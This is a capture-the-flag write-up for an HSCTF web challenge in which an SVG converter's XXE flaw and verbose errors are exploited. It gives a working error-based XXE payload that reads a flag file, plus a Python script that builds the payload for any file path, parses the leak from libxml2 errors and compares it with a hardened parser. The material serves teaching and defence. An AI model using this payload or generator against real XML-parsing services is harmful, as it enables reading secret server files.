# Web Exploitation

| Challenge                | Link                            |
| ------------------------ | ------------------------------- |
| png-wizard-v3 (8 solves) | [Here](#png-wizard-v3-8-solves) |

## png-wizard-v3 (8 solves)

### Description

Now with support for modern image formats!

[http://png-wizard-v3.hsctf.com](http://png-wizard-v3.hsctf.com/)

### Solution

When we try to upload an SVG file, the response is `Error converting file: Unknown image kind .PNG`.

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2FOplTMt2vvyUF3qJdSlNY%2Fimage.png?alt=media&#x26;token=3a6b3712-4f6f-4758-a9dd-ba099bb7ad51" alt=""><figcaption></figcaption></figure>

Checking the `reportlab 3.6.12` source code shows that this error comes from an invalid format string for the saved file: reportlab expects a format name such as `PNG`, not the extension `.PNG`.

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2FCBxpuhTvIypdxOtst5Ti%2Fimage.png?alt=media&#x26;token=4dad8e83-07e4-4cbf-8995-4ffe03b3aadc" alt=""><figcaption></figcaption></figure>

Looking at the source code, we can see that there is an XXE vulnerability in the SVG parsing. But since we cannot download the rendered file, the usual in-band XXE (reading a file into the output) does not work here.

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2FaQRde6G0WEwgXmZvyMdc%2Fimage.png?alt=media&#x26;token=a6e7f116-4d72-4acf-85fa-4205037172e7" alt=""><figcaption></figcaption></figure>

The other thing we have is verbose error reporting: the response tells us what caused the conversion to fail. So the idea is to use this error message to leak information from the system (error-based XXE). Payload reference: <https://balsn.tw/ctf_writeup/20190622-googlectfquals/>

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2FmaK6GJu3D7dwFmcDFOYI%2Fimage.png?alt=media&#x26;token=f6d4fb54-66ca-4e22-b736-44b14cc7fec8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2F03rjsgcssetE98nt5GrT%2Fimage.png?alt=media&#x26;token=ea1ebcf6-2864-4561-b668-5bcfbd507f9c" alt=""><figcaption></figcaption></figure>

```xml
<!DOCTYPE svg [ 
  <!ELEMENT message ANY >
  <!ENTITY % NUMBER '<!ENTITY &#x25; file SYSTEM "file:///proc/self/cwd/flag.txt">
  <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%NUMBER;
]><svg width="2048px" height="1024px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="40" x="40" y="40">&xxe;</text></svg>
```
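As an added example (not the writeup's own code, nor the challenge's source), the Python script below builds the nested-entity payload above for any target path, shows the two levels of escaping that smuggle `%` through an entity literal, pulls the leaked contents out of a libxml2-style "failed to load external entity" message, and, if lxml is installed, runs the payload through a permissive parser and through the hardened parser that closes this bug. The helper names (`entity_literal`, `build_error_xxe_svg`, `extract_leak`, `run_against_lxml`), the temporary flag file and the sample error text are all constructed here for illustration; that the challenge parsed the SVG with lxml/libxml2 and entity resolution enabled is an assumption.

```python
"""Error-based XXE through a single nested parameter entity.

Added example (not the writeup's own code): builds the payload for any
target path, shows the escaping that smuggles '%' through an entity literal,
parses the leak out of a libxml2 "failed to load external entity" message and,
if lxml is installed, runs it against a permissive and a hardened XMLParser.
The helper names, the sample flag file and the error text are constructed
here for illustration.
"""
import os
import re
import tempfile


def entity_literal(text):
    """Escape text for embedding inside a single-quoted <!ENTITY> value.

    Character references survive into the replacement text, so '%' becomes
    &#x25; (not a parameter-entity reference while the outer entity is being
    declared), a quote becomes &#x27; (does not close the literal) and '&' is
    escaped first, so that an inner &#x25; ends up as &#x26;#x25; and still
    reads &#x25; after one round of expansion.
    """
    return (text.replace("&", "&#x26;")
                .replace("%", "&#x25;")
                .replace("'", "&#x27;"))


def build_error_xxe_svg(target_path):
    """Return SVG bytes whose DTD leaks target_path via an entity-load error.

    Assumes a POSIX absolute path. The SVG body only has to be well formed;
    the leak happens while the DTD is parsed, before anything is rendered.
    """
    # What %NUMBER; expands to. Inside the eval literal, %file; is a live
    # parameter-entity reference (libxml2 allows it there because the text
    # arrives through an expanded entity, not from the document entity
    # itself), so the target's contents are spliced into error's SYSTEM
    # identifier. The &#x25; only turns into '%' when eval is expanded,
    # which is what declares 'error' as a parameter entity.
    level1 = (
        f'<!ENTITY % file SYSTEM "file://{target_path}">\n'
        "<!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM "
        "'file:///nonexistent/%file;'>\">\n"
        "%eval;\n"
        "%error;\n"
    )
    dtd = (
        "<!DOCTYPE svg [\n"
        f"<!ENTITY % NUMBER '{entity_literal(level1)}'>\n"
        "%NUMBER;\n"
        "]>\n"
    )
    body = ('<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
            '<text x="1" y="9">probe</text></svg>')
    return (dtd + body).encode()


# libxml2 reports the unresolvable SYSTEM identifier verbatim, e.g.
#   failed to load external entity "file:///nonexistent/<file contents>"
LEAK_RE = re.compile(r"file:///nonexistent/([^\"']*)")


def extract_leak(error_text):
    """Pull the leaked file contents out of the converter's error text."""
    match = LEAK_RE.search(error_text)
    return match.group(1).strip() if match else None


def run_against_lxml(svg_bytes, hardened=False):
    """Parse with lxml (libxml2) and return all recorded parser error text.

    Returns None when lxml is not installed. The permissive parser mirrors a
    converter that leaves resolve_entities on; the hardened one disables
    entity resolution and DTD loading, which is the fix for this bug class.
    """
    try:
        from lxml import etree
    except ImportError:
        return None
    parser = etree.XMLParser(
        resolve_entities=not hardened,
        load_dtd=not hardened,
        no_network=True,
        recover=False,
    )
    errors = []
    try:
        etree.fromstring(svg_bytes, parser)
    except etree.XMLSyntaxError as exc:
        errors.append(str(exc))
    # Non-fatal I/O errors do not abort the parse, so read the log as well.
    errors.extend(str(entry) for entry in parser.error_log)
    return "\n".join(errors)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        flag_path = os.path.join(tmp, "flag.txt")
        with open(flag_path, "w") as fh:
            fh.write("flag{constructed_sample_value}\n")  # constructed sample
        payload = build_error_xxe_svg(flag_path)
        print(payload.decode())
        for hardened in (False, True):
            errors = run_against_lxml(payload, hardened=hardened)
            if errors is None:
                print("lxml not installed; skipping the live parse")
                break
            label = "hardened" if hardened else "permissive"
            print(f"{label}: leaked = {extract_leak(errors)!r}")
```

The `%NUMBER;` reference has to sit between declarations, where parameter-entity references are allowed in an internal subset; everything that needs a parameter-entity reference inside a literal is pushed one level down into NUMBER's replacement text, which is why a single entity carries the whole chain.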

Flag: `flag{are_you_really_a_wizard_if_you_dont_use_magick}`
